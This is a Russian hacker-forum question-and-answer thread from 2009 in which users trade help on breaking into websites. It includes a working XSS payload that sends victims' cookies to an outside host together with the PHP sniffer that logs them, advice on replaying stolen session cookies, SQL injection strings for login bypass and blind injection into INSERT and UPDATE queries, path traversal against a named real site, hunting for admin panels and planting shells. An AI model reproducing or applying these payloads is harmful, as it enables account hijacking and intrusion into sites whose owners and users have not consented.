меняется при изминении значения лимита только эта часть:

login1821165f4dcc3b5aa765d61d8327deb882cf99

вобщем что посоветуете?

nub-hacker
29.07.2009, 22:19
после зелёного идёт MD5

L I G A
29.07.2009, 22:24
после зелёного идёт MD5
это понятно что мд5,но эта часть во всех записях не меняется .

Jokester
29.07.2009, 22:27
L I G A

Меняется окончание логина? Где разделитель-то?

или concat_ws(0x3a,login,pass) или concat(login,0x3a,pass), ты уж определись

L I G A
29.07.2009, 22:30
concat_ws(0x3a,login,pass)
login363307:5f4dcc3b5aa765d61d8327deb882cf99
меняется:
login363307:5f4dcc3b5aa765d61d8327deb882cf99

bons
29.07.2009, 22:42
наверно таки у них пароли одинаковые) будто бы какой-то неоригинальный реггер заюзали

nub-hacker
29.07.2009, 22:44
Это чтото типа соли. токо для логина. короче лучше ставь себе этот двиг на машину и ковыряйся и разбирайся

kiddie
29.07.2009, 22:57
Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
<? $query = $_SERVER['QUERY_STRING']; $query .= "\n"; $db="cookies.txt"; $fh=fopen ($db, "a+"); fputs ($fh, "$query"); fclose ($fh); ?>
что обозначают полученные данные, тоесть что приходит...?

Велемир
29.07.2009, 23:09
Уязвимости php 5.2 ?? :)

http://www.xakep.ru/vulnerability/PHP/


Так точно,сержант Витя )У мя от нижеприведённого сплойта сознание уплывает)Ну что ж,попробую чтоли : Р

mailbrush
29.07.2009, 23:10
$_SERVER['QUERY_STRING']

nub-hacker
29.07.2009, 23:32
Хакнул комп с помошбю последнего сплоита под мастдай. есть cmd.exe подскажите как залить мне файл туда. чтобы потом его выполнить или чтото подобное подскажите что можно с делать в моём случае

ЗЫ с меня +

it's my
30.07.2009, 03:37
Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
<? $query = $_SERVER['QUERY_STRING']; $query .= "\n"; $db="cookies.txt"; $fh=fopen ($db, "a+"); fputs ($fh, "$query"); fclose ($fh); ?>
что обозначают полученные данные, тоесть что приходит...?
:( это мой друг к тебе пришли куки (Ку́ки (слово не склоняется; от англ. cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. © ru.wikipedia.org)
Теперь твоя задача, подменить на полученные данные, свои. А сделать это можно следующим образом:

Mozilla Firefox - при помощи плагина: Add N Edit Cookies
Opera - следующей манипуляцией: "Инструменты -> Дополнительно -> Управление cookies..."

xa-xa89
30.07.2009, 09:37
Хакнул комп с помошбю последнего сплоита под мастдай. есть cmd.exe подскажите как залить мне файл туда. чтобы потом его выполнить или чтото подобное подскажите что можно с делать в моём случае

через ftp
http://cmdhelp.ru/index.php?cmd=ftp

DeepXhadow
30.07.2009, 16:50
POST /process.wget_upload.php HTTP/1.0
Host: oneclicktube.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Content-Type: application/x-www-form-urlencoded
Content-length: 214
Connection: Close

title=&keywords=Mr%2E&pornstars=111-222-1933email@address.tst&description=111-222-1933email@address.tst&channel=111-222-1933email@address.tst&paysite=111-222-1933email@address.tst&url=dds'&button=Reset&submit=Upload&

Блинд вроде...но и как блинд не хочет раскручиваться(

Krist_ALL
30.07.2009, 18:25
Как руками определить версию сервера и название сервера.
Я посылаю кривой пакет и иногда в ошибке есть имя и даже иногда версия сервера. Есть ли другие методы определения? И может есть какиенить спец пакеты на которые веб сервер так ругнется что всегда будет название в ошибке? И как определяет хспайдер?

The_HuliGun
30.07.2009, 18:36
Как руками определить версию сервера и название сервера.
Я посылаю кривой пакет и иногда в ошибке есть имя и даже иногда версия сервера. Есть ли другие методы определения? И может есть какиенить спец пакеты на которые веб сервер так ругнется что всегда будет название в ошибке? И как определяет хспайдер?


[The_HuliGun@server]$ nc edu.mail.ru 80
HEAD / HTTP/1.0

HTTP/1.1 302 Found
Server: nginx/0.6.31
Date: Thu, 30 Jul 2009 14:34:34 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Location: http://edu.mail.ru/cgi-bin/index.cgi

Krist_ALL
30.07.2009, 19:45
Нето...Нада не прибегая к другим программам

Jokester
30.07.2009, 19:53
Krist_ALL Что значит "руками" ? Пощупав его что-ли? Попробуй сформулировать вопрос нормально, что тебе нужно


Я посылаю кривой пакет
Нето...Нада не прибегая к другим программам

Ты пакет экспресс почтой что-ли посылаешь?

Krist_ALL
30.07.2009, 20:57
Не прибегая к сканеру

Tigger
30.07.2009, 21:23
Krist_ALL
Я тя не понял. Часто, при ошибках сервера вылетает ошибку и внизу версия Апача и т.д... Как вызвать? site.ru/[несущетсвующая дира]... Если не правильно понял, то задай нормально вопрос.

Krist_ALL
30.07.2009, 21:37
В 404 ошибке не всегда е инфа о сервере. Нада как то еще узнать.Как сканеры определяют?

[Raz0r]
30.07.2009, 21:49
В HTTP-ответе сервера (заголовки Server, X-Powered-By):
HTTP/1.1 200 OK
Date: Thu, 30 Jul 2009 17:51:04 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16505

2la.painkiller
31.07.2009, 02:09
Как залить шел на mybb имея админку??? все мозга уничтожил (((

Pashkela
31.07.2009, 02:23
https://forum.antichat.ru/thread27777.html

SeNaP
31.07.2009, 06:04
Доброе утро.
Пробегялся я брутом подному форуму.
И заметил одну вещ, есть
NICK: slot
Pаsswd: 00
Но дело в том , что можно войти и таким поролем 000, т.е. если в пароле одни "нули", то длина пароля не имеет значене. Токое происходит только с нулями.
Это какойто баг?
И возможно ли что нибуть поиметь с этого?

Ded MustD!e
31.07.2009, 06:20
Доброе утро.
Пробегялся я брутом подному форуму.
И заметил одну вещ, есть
NICK: slot
Pаsswd: 00
Но дело в том , что можно войти и таким поролем 000, т.е. если в пароле одни "нули", то длина пароля не имеет значене. Токое происходит только с нулями.
Это какойто баг?
И возможно ли что нибуть поиметь с этого?

что за форум? название, версия.

SeNaP
31.07.2009, 06:24
форум самописный
в личку с кину адрис

Ded MustD!e
31.07.2009, 09:44
форум самописный
в личку с кину адрис
у меня не получилось авторизоваться с теми данными, которые ты кинул.

SeNaP
31.07.2009, 09:48
у меня не получилось авторизоваться с теми данными, которые ты кинул.
ник тот я впример дал, а на самом деле ник uplol.ru
Пароль: 00 или 0000000 разницы нет

Ded MustD!e
31.07.2009, 10:09
ник тот я впример дал, а на самом деле ник uplol.ru
Пароль: 00 или 0000000 разницы нет

потестил, ну вобщем-то ничего ты с этого не поимеешь, просто почему-то криво обрабатываются пароли состоящие из "0", ни с какими другими символами больше не прокатывает.

cr0w
31.07.2009, 10:32
SeNaP

Скорее всего там пхп?

Примерчик:
<?php
if ( $_GET[pass] == '00' ) echo "В первом случае пароль верный. ";
if ( $_GET[pass] === '00' ) echo "И во втором случае тоже верный!";
?>
Если передать скрипту в параметре 'pass' любое колличество нулей, то пароль в первом if'e всегда будет верный. Во втором - только при двух нулях.

Т.е. в том скрипте некорректно реализована проверка верности пароля. А о разнице между '==' и '===' стоит почитать в док-ии по PHP. (:

2la.painkiller
31.07.2009, 10:50
https://forum.antichat.ru/thread27777.html
Что ты даешь, там нету способов внедрения шела.

Ответ остается открытым:

Как залить шел на mybb имея админку??? все мозга уничтожил (((

SeNaP
31.07.2009, 11:07
SeNaP

Скорее всего там пхп?

Примерчик:
<?php
if ( $_GET[pass] == '00' ) echo "В первом случае пароль верный. ";
if ( $_GET[pass] === '00' ) echo "И во втором случае тоже верный!";
?>
Если передать скрипту в параметре 'pass' любое колличество нулей, то пароль в первом if'e всегда будет верный. Во втором - только при двух нулях.

Т.е. в том скрипте некорректно реализована проверка верности пароля. А о разнице между '==' и '===' стоит почитать в док-ии по PHP. (:
Да, один ноль не прокатыват, токое ощущение, что просто его скрипт не замечает, просит ввести пароль.

PHP не проверяет равенство типов при двойном равно (==), автоматически приводя их к строковому.
Для верного сравнения данных разных типов применяется тройное равно (===).
Неправильное использование двойного равно, например, в авторизации, == может обернуться уязвимостью.

PHP код:
$aaa = 123456;

if( '123456' == $aaa ){echo '<br>ok!';}else{echo '<br>no.';}
if( '123456' === $aaa ){echo '<br>ok!';}else{echo '<br>no.';}


ok!
no.
(C)Alekt

Что то я вообще запутался

FireFenix
31.07.2009, 11:39
if ($_GET[pass] == 00)
В этом случае $_GET[pass] при водится к строковому типу и сравнивается с 00, которое тоже приводится к строковому типу

'00' равно 00
00 равно 00

if ($_GET[pass] === 00)
В этом случае $_GET[pass] сравнивается с 00 c учётом типов

'00' не равно 00
00 равно 00


Если передать скрипту в параметре 'pass' любое колличество нулей, то пароль в первом if'e всегда будет верный. Во втором - только при двух нулях.
0 - универсальный => использование символов отличных от нуля даёт нормальный результат

Pashkela
31.07.2009, 11:48
Что ты даешь, там нету способов внедрения шела.

например так:

https://forum.antichat.ru/showpost.php?p=565927&postcount=8

и причем здесь обязательно именно админка. Переведи для начала что такое "Remote Code Execution"

mailbrush
31.07.2009, 12:24
http://moikabriz.ru/uslugi.php?uslugi=5Инклюдит файлhttp://moikabriz.ru/uslugi/uslugi5Т.е. в скрипте что-то типа <?php
include('uslugi/uslugi'.$_GET['id']);
?>Соответственно http://moikabriz.ru/uslugi.php?uslugi=/../uslugi5 должен заинклюдить тот же http://moikabriz.ru/uslugi/uslugi5, но нет - пишет нот фаунд.http://moikabriz.ru/uslugi.php?uslugi=/../../index.phpдолжен заинклюдить индекс, но опять нот фаунд.

cr0w
31.07.2009, 12:32
SeNaP

Вот еще интересный пример:
<?php
if ( '000' == '000000' ) echo "Первое условие верно. ";
if ( '00789' == '000000000789' ) echo "Второе условие верно. ";
if ( "00abc" == "0000abc" ) echo "Третье условие верно";
?>ВыведетПервое условие верно. Второе условие верно.
Т.е. при сравнении оператором '==' строк, состоящих из чисел, предваряемых нулями, нули эти, получается, "отбрасываются". Почему так - я пока не знаю, видимо какая-то фича пхп, постараюсь разобраться в этом.

Pashkela
31.07.2009, 12:36
а на

http://moikabriz.ru/uslugi.php?uslugi=../../../../../../../../../../../../../../etc/passwd

пишет

Operation not permitted

попугай
31.07.2009, 12:48
мод секурити или типа того... Бесполезно...

geezer.code
31.07.2009, 13:33
http://moikabriz.ru/uslugi.php?uslugi=/../uslugi5 должен заинклюдить тот же http://moikabriz.ru/uslugi/uslugi5, но нет - пишет нот фаунд.http://moikabriz.ru/uslugi.php?uslugi=/../../index.phpдолжен заинклюдить индекс, но опять нот фаунд.
*зачеркнуто*
Для начала определись что есть папка, и что есть файл.
Ты пытаешься подняться выше несуществующего файла
*/зачеркнуто*
соре ошибочка.
Ты пытаешься подняться выше несуществующего пути. вот.

Jokester
31.07.2009, 15:03
Т.е. при сравнении оператором '==' строк, состоящих из чисел, предваряемых нулями, нули эти, получается, "отбрасываются". Почему так - я пока не знаю, видимо какая-то фича пхп, постараюсь разобраться в этом.
Строки, при таком сравнении, приводятся интерпритатором к числам, если в них вначале есть числа. Остальное отбрасывается. Посмотри вот так:
if ( 4 == '4abc' ) echo "условие верно. ";

Тоесть по сути ты сравниваешь
1. 0 с 0
2. 789 и 789
3. Нет чисел, тоесть 2 разных строки

Ну а "0" это не совсем число, при таком сравнении. Это у пыха "особенный символ" :)
if ( 0 == null ) echo "условие верно. ";
if ( 4 == '0004abc' ) echo "условие верно. ";

cr0w
31.07.2009, 15:48
jokester

Интерпретатор переводит строку к числу, когда у нее первый символ - цифра, если второй операнд - числовой (как в твоем примере). Но я в тех примерах сравнивал по две строки, а не числа со строками.
К тому же, если интерпретатор просто переводит эти строки в числа, то с нулем в начале, он по логике вещей скорее должен был бы считать их восьмеричными числами, но это не так: 0789 - не восьмеричное число.

По сути, скорее всего пхп сравнивает:
'' c '' (пустые строки)
'789' и '789' (именно строки, а не числа)
и строки '00abc' и '0000abc' - при наличии букв нули в строках не убираются, даже если вставить цифры:
<?php
if ( '0012a' == '000012a' ) echo "Условие верно";
?>Результатом условия будет false.

add: впрочем, это пока просто мои предоложения - как будет время покопаюсь в сорсах php по этому поводу.

Jokester
31.07.2009, 19:14
cr0w

Он так-же приведёт строки к числу если обе строки состоят только из цифр.

add/

Так что вроде всё логично. Это строки, т.к. буквы присутствуют:
if ( '0012a' == '000012a' ) echo "Условие верно";

А вот это уже числа:
if ( 4 == '4abc' ) // сдесь т.к. один из операндов число
if ( '000' == '000000' ) // ну а тут
if ( '00789' == '000000000789' ) // всё числа

PS Спасибо Qwazar, направил на путь истиный :)

HAXTA4OK
31.07.2009, 23:12
раз удалил тему мою кто то напишу тут

есть XSS спер куки...тока спер я PHPSESSID а с логином и пассом куки не сперлось

что это мне дает? можно ли что нибудь с этим сделать?

cr0w
31.07.2009, 23:33
jokester

В целом, ты тут прав.

Хотя насчет "логичности" таких преобразований типов можно было бы поспорить. Но в документации такое поведение, вобщем-то, кое-как зафиксировано, т.ч. ресерчить тут вроде как и нечего.

Qwazar
31.07.2009, 23:37
cr0w, да логично, логично.

Если один из операндов однозначно число, то оба операнда приводятся к числам, и сравниваются как числа.

Если оба записаны в виде строк, то проверяется числа это или строки, если числа, то сравниваются как числа, если хотябы один операнд однозначно не число, то сравниваются как строки, посимвольно.

Логично :)

cr0w
31.07.2009, 23:58
Qwazar

Нелогично в том плане, что числа в пхп могут быть не только десятичными. И тут возникает "неоднозначность", когда в строке находится число, начинающееся с нуля. Почему пхп приводит его к десятичному числу, отбросив нули, а не к восьмеричному (кстати, это не только в пхп так, но и в perl, например) ? (;

JOHNik
01.08.2009, 05:07
раз удалил тему мою кто то напишу тут

есть XSS спер куки...тока спер я PHPSESSID а с логином и пассом куки не сперлось

что это мне дает? можно ли что нибудь с этим сделать?
Можно попробовать вставить в браузер, будешь авторизован на сайте автоматом, единственный минус идентификаторы долго не живут.

Pashkela
01.08.2009, 05:30
как и любые остальные куки - время жизни есть у всего. Вы вообще, хоть раз в жизни, смотрели свои куки на форумах всяческих? Что, везде прямо таки md5 и лежит? Давно уже пора привыкнуть, что если хотя бы сессия есть - уже круто. Про пароли забудьте раз и навсегда на бол-мен нормальных ресурсах

HAXTA4OK
01.08.2009, 08:27
как и любые остальные куки - время жизни есть у всего. Вы вообще, хоть раз в жизни, смотрели свои куки на форумах всяческих? Что, везде прямо таки md5 и лежит? Давно уже пора привыкнуть, что если хотя бы сессия есть - уже круто. Про пароли забудьте раз и навсегда на бол-мен нормальных ресурсах

ну вот а как мне ее реализовать то? =)

Bramin
01.08.2009, 12:56
ай нид хелп. Не могу найти админку http://www.mgounb.ru

Calcutta
01.08.2009, 12:59
Bramin, http://madnet.name/tools/madss/ ответит на твой вопрос.

*добавляй в закладки браузера, полезно будет.

Qwazar
01.08.2009, 13:00
Qwazar

Нелогично в том плане, что числа в пхп могут быть не только десятичными. И тут возникает "неоднозначность", когда в строке находится число, начинающееся с нуля. Почему пхп приводит его к десятичному числу, отбросив нули, а не к восьмеричному (кстати, это не только в пхп так, но и в perl, например) ? (; Ты использовал только цифры 0-7 ? С плавающими числами всех видов норм приводит к числу. С восьмеричными не пробовал.

Pashkela
01.08.2009, 14:06
ну вот а как мне ее реализовать то? =)


в опере вставляй вместо своих и F5

cr0w
01.08.2009, 18:19
Ты использовал только цифры 0-7 ? С плавающими числами всех видов норм приводит к числу. С восьмеричными не пробовал.
Например:
<?php
if ( 12 == '12' ) echo "Условие 1 верно. ";
if ( 012 == '012' ) echo "Условие 2 верно. ";
if ( 0x1A == '0x1A' ) echo "Условие 3 верно.";
?>
выведетУсловие 1 верно. Условие 3 верно.Шестнадцатеричные числа - нормально преобразуются из строки в число, восмеричные - нет. Собственно, в этом и вижу некоторую "нелогичность" такого поведения интерпретатора.

попугай
01.08.2009, 23:08
Пытаюсь провести инъекцию в Access (в форме авторизации).

Ввожу
логин p' or 1=1/* и пароль произвольный, но мне выдает

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression 'usr='p' or 1=1/*''.

/admin/script.asp, line 25

Что не так?

Kaimi
01.08.2009, 23:15
Вроде в MSSQL вместо /* нужно писать -- или #

[Raz0r]
01.08.2009, 23:17
В Access используй нулл байт чтобы отбросить ненужную часть запроса

crawen_s
01.08.2009, 23:20
Есть иньекция

15+union+select+1,2,3,column_name,5,6,7+from+infor mation_schema.columns+where+table_name='menu'--

Но почему-то ничего не виводится... Пробовал на нескольких сайтах. Может запрос неправильный?

crawen_s
01.08.2009, 23:35
спасибо, помог)

попугай
01.08.2009, 23:40
']В Access используй нулл байт чтобы отбросить ненужную часть запроса


C нульбайтом также..

[Raz0r]
01.08.2009, 23:49
Скорее всего данные отправляются постом, поэтому проверь, что отправляется %00, а не %2500. Отправляй данные напрямую или используя плагины для FF типа TamperData.

crawen_s
02.08.2009, 00:24
http://www.washingtoninstitute.org/

Помогите админку найти.. искал IntelliTamper, не помогло(

Пасс и логин в базе есть.

попугай
02.08.2009, 00:55
']Скорее всего данные отправляются постом, поэтому проверь, что отправляется %00, а не %2500. Отправляй данные напрямую или используя плагины для FF типа TamperData.

Да слал скриптом на php через сокеты - и \x00 и %00 - ощибка та же.

SeNaP
02.08.2009, 10:55
Вот решил обратиться за советом :)
Вот такой код

$id=((int)abs($_GET['id']));
$sql=mysql_query('SELECT * FROM `site` where `id`=\''.$id.'\' LIMIT 1;'))>=1)

Полность не уязвим от SQL inj?

попугай
02.08.2009, 11:14
да

попугай
02.08.2009, 11:22
зачем фильтрация? какая фильтрацция..? (int) - твоя фильтрация...


http://forum.antichat.ru/thread30641.html

j0ker13
02.08.2009, 19:26
игрался с консолью мускула)
может и было где то но я узнал что при иньекции в инсерте можно сделать блинд и выполнять запросы))хочу проверить прав или нет?)
имеем таблица users
mysql> select * from users;
+-------+-------------------+
| U_ID | U_PASSWORD |
+-------+-------------------+
| admin | thankyou444 |
+-------+-------------------+

теперь представим регистрацию на сайте) естественно будет больше колонок но не суть важно)
смысл: INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ($_GET['id'],$_GET['pass']);
допустим

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1','2');
Query OK, 1 row affected (0.00 sec)

как и должно быть :)
мы же можем изменять параметры id и pass
mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=1,1,(select 1 union select 2)));
Query OK, 1 row affected (0.02 sec)

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=2,1,(select 1 unio
n select 2)));
ERROR 1242 (21000): Subquery returns more than 1 row

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(substring(version(),
1,1)=4,1,(select 1 union select 2)));
ERROR 1242 (21000): Subquery returns more than 1 row

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(substring(version(),
1,1)=5,1,(select 1 union select 2)));
Query OK, 1 row affected (0.00 sec)

но как я понимаю должно быть так INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('$_POST['id']','$_POST['pass']');
тогда получится так
mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1','if(substring(version()
,1,1)=5,1,(select 1 union select 2))');
и mysql> select * from users;
+-------+------------------------------------------------------------+
| U_ID | U_PASSWORD |
+-------+------------------------------------------------------------+
| joker | thankyou444 |
| 1 | if(substring(version(),1,1)=5,1,(select 1 union select 2)) |
+-------+------------------------------------------------------------
выход (наверна):
$_GET['id']=1',if(1=1,1,2)/* получится запрос
INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=1,1,2)/*','')
и он выполнится)
естественно все прокатит при определенных фазах луны, выключенных магик_квотес и т.д.)
прав я или нет?)

Jokester
02.08.2009, 19:29
Да ты ЕвГЕНИЙ!!! :D
https://forum.antichat.ru/threadnav35207-1-10.html

Инфа от 11.03.2007

j0ker13
02.08.2009, 23:10
2jokester
знаю я эту статью)
но там нет объединиения insert и "Subquery returns more than 1 row" :)
упомянув о срыве запроса ошибкой он не сказал что можно это провести и с другими запросами. не только селект как написано в статье)

думаю это дополнение ))))

и еще вопрос)
mysql> update `users` set U_ID='l' where U_ID=if(1=1,'iii',(select 1 union sele
t 2));
Query OK, 0 rows affected (0.09 sec)
Rows matched: 0 Changed: 0 Warnings: 0

mysql> update `users` set U_ID='l' where U_ID=if(1=2,'iii',(select 1 union sele
t 2));
Query OK, 0 rows affected, 1 warning (0.03 sec)
Rows matched: 0 Changed: 0 Warnings: 0

в последнем запросе говорит про варнинг но не ерор)
неужели нельзя провести провокацию на ошибку?)

Jokester
02.08.2009, 23:28
j0ker13

Специально для тебя:

п 2 (большие жирные зелёные буковки):
[2] INSERT и другие
п 4 (те-же самые буковки)
[4] Альтернатива benchmark'y

И вот тут уже твои примеры, только в качестве оператора, для примера взят select. Но это без разницы, оператор любой может быть, в том числе и update

упомянув о срыве запроса ошибкой он не сказал что можно это провести и с другими запросами. не только селект как написано в статье)
Разумеется, вместо INSERT может стоять любой другой оператор, в том числе и SELECT, ведь с ним тоже бывают cложные случаи инъекций.
Просто прочти её :)

j0ker13
03.08.2009, 11:50
:) ладна не будем засорять топ) удали сообщения)
пусть читают нормальные статьи))

Krist_ALL
03.08.2009, 12:45
Хотелось бы заметить, что при update нельзя читать этуже таблицу, другую можно. Например:insert into users values(1,(select ...From users)) будет ошибка. Но это так,замечание.

SeNaP
03.08.2009, 15:25
Возможно ли как нибудь с помощью xss угонять сессию не из кеша, а из GET, т.е. из адрисной строки?

Pashkela
03.08.2009, 15:29
Вообще-то сессии с помощью XSS угоняются из cookie, если в куках есть сессия - можно угнать, если найти xss

SeNaP
03.08.2009, 15:35
Что за SID и кеш? Если SID, это SesionID, то да.
Както так:
document.write('<html><body><script src=sniffer/img.gif?"+document.location></script></body></html>');
Ты знаеш что такое GET запрос?

Вообще-то сессии с помощью XSS угоняются из cookie, если в куках есть сессия - можно угнать, если найти xss

Даже если прекрипить скнифер в место картинки всеровно не получится?

SeNaP
03.08.2009, 15:43
Ну как ты написал это адресная строка.
В твоём примере совсем другое...

Krist_ALL
03.08.2009, 15:47
Гет запрос это переменные которые видна в адресной строке. Если ид сессии передается через гет, следовательно сессионид видно в браузере в адресной строке, следовательна надо передать сндферу адресную строку. Снифер.Пхп? +документ.Локатион. По другому нельзя!

mailbrush
03.08.2009, 15:47
Pavlov, бредовый твой код.
SeNaP, если сессия в урле, записывай рефферер.

Pashkela
03.08.2009, 16:07
Если сессия есть в адресной строке, где есть XSS (если пассивка), то там всегда будет сессия того, кто даёт такую ссылку:))) Т.е. таким вычурным методом вы сопрете свою собственную сессию. Так что только +document.cookie было и остается актуальным:)

Ну и совсем другое дело, если активная XSS, тогда достаточно будет перенаправить на свой PHP-снифер и взять рефа, без всяких +document.cookie, но смысла в таком занятии особого нет, т.к. в куках может быть что-то поинтересней чем просто сессиия, например id и прочие параметры, так что опять к нашим баранам: +document.cookie, как неизбежность

SeNaP
03.08.2009, 16:07
mailbrush, точнооо, спасибо :)

SeNaP
03.08.2009, 16:13
Если сессия есть в адресной строке, где есть XSS (если пассивка), то там всегда будет сессия того, кто даёт такую ссылку:))) Т.е. таким вычурным методом вы сопрете свою собственную сессию. Так что только +document.cookie было и остается актуальным:)
Ты наверное не правельно понял, может я чтото не догоняю.
Уменя вданном случии, можно перкрепить снифер вместо автарки в профеле, когда юзер будет смотреть профиль, то у него должно передатся на снивер всё что у него в адрисной строке.
Т.е. можно за юзать http_referer, адальше записыать в логи :cool:

Pashkela
03.08.2009, 16:17
Ты не догоняешь, это - активная XSS, читай мой пост выше про активки, какой смысл тырить только рефа, если можно стырить все куки. Реф и так тырица в нормальных снифах по умолчанию

SeNaP
03.08.2009, 16:21
Ты не догоняешь, это - активная XSS, читай мой пост выше про активки, какой смысл тырить только рефа, если можно стырить все куки. Реф и так тырица в нормальных снифах по умолчанию
Но вот только форум тот где XSS, кроме бана и антифлуда в кеш больше не что не записывает

Pashkela
03.08.2009, 16:24
Тогда да, будет достаточно рефа схватить, тогда вопрос не понятен вообще к чему - еще раз - в любом нормальном снифаке реф тырица и так по умолчанию, например в снифере от того же каника.

Просто ставишь перенаправление на свой снифак и всё, только не забудь потом чувака обратно вернуть:)

ЗЫЖ И не называй куки кэшом, это разные вещи

Nightmarе
04.08.2009, 13:08
Значит у меня к вам следующий вопрос ©

Нашёл SQL на нужном мне сайте в POST запросе.
Воткнув обычную ковычку выскочило:
{"error":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1"}
Во первых почему то запрос взялся в фигурные скобки...

Дальше попробовал подобрать количество столбцов:
add=-1'+UNION+SELECT+1/*
и так
add=-1+UNION+SELECT+1/*
и так
add=-1'+UNION+SELECT+1--
и так
add=-1'+UNION+SELECT+1#
Ошибка SQL оставалась всё та-же, то есть нигде не было уведомления про несовпадения столбцов, как бы я не пытался...

Далее подставив вместо запроса:
add=lol
Я получаю:
{"error":"Unknown column 'ass' in 'where clause'"}
В общем у кого есть какие идеи по объеденению столбцов, то напишите как правильно в моём случае их сделать...
Может тут что фильтруется?

mailbrush
04.08.2009, 13:21
... near '\\'' at ...
Вроде это сведетельствует о том, что magic_quotes_gpc используется вместе с addslashes, т.к. после экранирования кавычки мэджиками, идет экранирование слеша (я могу ошибаться)...
Далее подставив вместо запроса:
add=lol
Я получаю:
{"error":"Unknown column 'ass' in 'where clause'"}
Подставь другой текст, ass так же?

Во первых почему то запрос взялся в фигурные скобки...
Ну мб вывод ошибки типа
...
echo '{"error":"'.mysql_error().'"}';
...

xa-xa89
04.08.2009, 13:24
А может это не селект а update запрос?
Судя по названия переменной адд
А может инсерт вовсе...

Nightmarе
04.08.2009, 13:30
Подставь другой текст, ass так же?

Тут я ошибся, в переменной add= содержится цифровой номер колонки, какое бы значение не подставить, такое и отобразится на экране.
Вот только не знаю влияет ли это на SQL или нет.

А по поводу magic_quotes_gpc используется вместе с addslashes, что тут можно предпринять, или дохлый номер?

Судя по всему запрос и есть Update потому как он POST`om отправляет заказ на сайт

xa-xa89
04.08.2009, 16:02
ну если он UPDATE то union select не прокатит!
с помощью юнион можно только объединить два SELECT запроса.

по идеи там запрос типа
UPDATE blabla SET bla_par={$_POST['add']} bla..... WHERE bla......
Поюзать ты сможешь если: сможешь потом получится посмотреть то что проапдейтил!

Не плохо было б знать какие еще это запрос изменяет поля.А вообще подзапросы в помощь.

пример

UPDATE blabla SET bla_par=(SELECT version()) WHERE tratata....-- bla..... WHERE bla......
или ты к примеру знаешь что этот же запрос апдейтит текстовое поле name
UPDATE blabla SET bla_par=1, name=(SELECT concat_ws(0x3a,version(),database(),user()) WHERE tratata -- bla..... WHERE bla......
лучше конечно взглянуть бы в сорцы если это возможно что б иметь представление о структуре запроса

извените если сказал бред (=

АПД: или юзай more than 1 rows https://forum.antichat.ru/threadnav35207-1-10.html
АПД2:
UPDATE table SET add=(SELECT ASCII( substring( (SELECT login FROM users WHERE id=1 ),3,1) )) WHERE id=1

вот пример запроса с инъекцией(жирным наш код)
перебираем по одному символы. Это конечно если можно глянуть результат апдейта.

DimOnOID
04.08.2009, 18:11
ну если он UPDATE то union select не прокатит!
с помощью юнион можно только объединить два SELECT запроса.

по идеи там запрос типа
UPDATE blabla SET bla_par={$_POST['add']} bla..... WHERE bla......
Поюзать ты сможешь если: сможешь потом получится посмотреть то что проапдейтил!

Не плохо было б знать какие еще это запрос изменяет поля.А вообще подзапросы в помощь.

пример

UPDATE blabla SET bla_par=(SELECT version()) WHERE tratata....-- bla..... WHERE bla......
или ты к примеру знаешь что этот же запрос апдейтит текстовое поле name
UPDATE blabla SET bla_par=1, name=(SELECT concat_ws(0x3a,version(),database(),user()) WHERE tratata -- bla..... WHERE bla......
лучше конечно взглянуть бы в сорцы если это возможно что б иметь представление о структуре запроса

извените если сказал бред (=

АПД: или юзай more than 1 rows https://forum.antichat.ru/threadnav35207-1-10.html
АПД2:
UPDATE table SET add=(SELECT ASCII( substring( (SELECT login FROM users WHERE id=1 ),3,1) )) WHERE id=1

вот пример запроса с инъекцией(жирным наш код)
перебираем по одному символы. Это конечно если можно глянуть результат апдейта.
и часто ты такое видел?..чтобы знач не в кавычках шло?..не считая int..?

xa-xa89
04.08.2009, 18:21
add= содержится цифровой номер колонки
судя по этому инт!

ILYAtirtir
04.08.2009, 18:52
довольно часто бывает без ковычек

Ctacok
06.08.2009, 06:14
Имею доступ к админке. Двиг самописный. Могу редактировать новости. даже html не вставляет типа
<script>alert(//);</script>
Есть ли возможность вставить шелл\php код?
Вообще если даже html отбрасывает, то наверно нет.
В бд есть таблица с новостями, там то точно фильтра нету, сделай прям в таблице PHP скрипт.
Ну а вообще некто не отменял проверять :)

<?PHP
echo "Proverka antichat";
?>

Потом заходишь в новость, CTRL+F, Proverka antichat.
Если найдено -> include('твой шелл');
Если ненайдено -> облом, ищи другую дыру.

xa-xa89
06.08.2009, 07:08
тогда вставляй туда уже любой свой хтмл/жаваскрипт код только шеллом это тебе не светит...

Ctacok
06.08.2009, 08:47
т.е. как?)
зы: <?php echo "test"; ?> не пашет, прямо так и выводит ((
В таблице - в базе данных.
Просто перед заносом данных в таблицу новостей.
Идёт фильтр написанный на PHP.
А так если вручную вписать то выполниться.

mailbrush
06.08.2009, 09:38
В вышеприведенном скрипте - нет.
